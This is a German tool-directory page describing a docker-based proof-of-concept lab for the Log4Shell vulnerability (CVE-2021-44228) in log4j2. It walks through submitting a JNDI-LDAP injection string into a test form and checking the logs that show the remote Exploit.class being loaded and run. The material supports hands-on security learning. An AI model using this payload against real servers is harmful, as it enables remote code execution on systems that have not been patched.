Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
log4j-rce-CVE-2021-44228 — log4j2 CVE-2021-44228 POC | Kitploit
Tools/GitHubGitHub/1hakusai1/log4j-rce-cve-2021-44228
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHub1hakusai1/log4j-rce-cve-2021-44228

log4j-rce-CVE-2021-44228

log4j2 CVE-2021-44228 POC

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Übersicht

Dies ist ein Projekt, um die Remote-Code-Ausführung-Schwachstelle von log4j2 (CVE-2021-44228) praktisch zu testen.

Container starten

root@kitploit:~
docker-compose up

Der log4j-Container benötigt nach dem Start etwas Zeit, bis er bereit ist. Überprüfen Sie den Fortschritt mit folgendem Befehl:

root@kitploit:~
docker logs -f log4j

Wenn Server started: Listening on port 8081 angezeigt wird, ist alles bereit.

Zustand vor dem Angriff überprüfen

Überprüfen Sie das Verzeichnis /root des log4j-Containers.

root@kitploit:~
docker exec log4j ls /root

Im Ausgangszustand existiert nur das Verzeichnis work.

Den eigentlichen Angriff durchführen

Rufen Sie http://localhost:8081/ auf. Es handelt sich um eine einfache Anwendung, die lediglich den im Formular eingegebenen Namen auf dem Bildschirm und im Log ausgibt.

Geben Sie im Formular ${jndi:ldap://ldap.example.com/cn=java,dc=example,dc=com} ein und senden Sie es ab.

Überprüfen Sie das Verzeichnis /root des log4j-Containers.

root@kitploit:~
docker exec log4j ls /root

Der vom Angreifer bereitgestellte Code wurde ausgeführt und es sollten Dateien erstellt worden sein, die zuvor nicht existierten. Die Dateinamen enthalten Zeitstempel, sodass mit jedem Angriff eine neue Datei hinzugefügt wird.

Wenn Sie die Logs des ldap-Containers überprüfen, sehen Sie, dass vom log4j-Container eine SEARCH-Anfrage eingeht.

root@kitploit:~
docker logs ldap

Wenn Sie die Tomcat-Logs des web-Containers überprüfen, sehen Sie, dass vom log4j-Container ein Zugriff auf Exploit.class (die für den Angriff verwendete Klasse) erfolgt.

root@kitploit:~
docker exec -it web bash
cat /usr/local/tomcat/logs/localhost_access_log.*
Tool herunterladen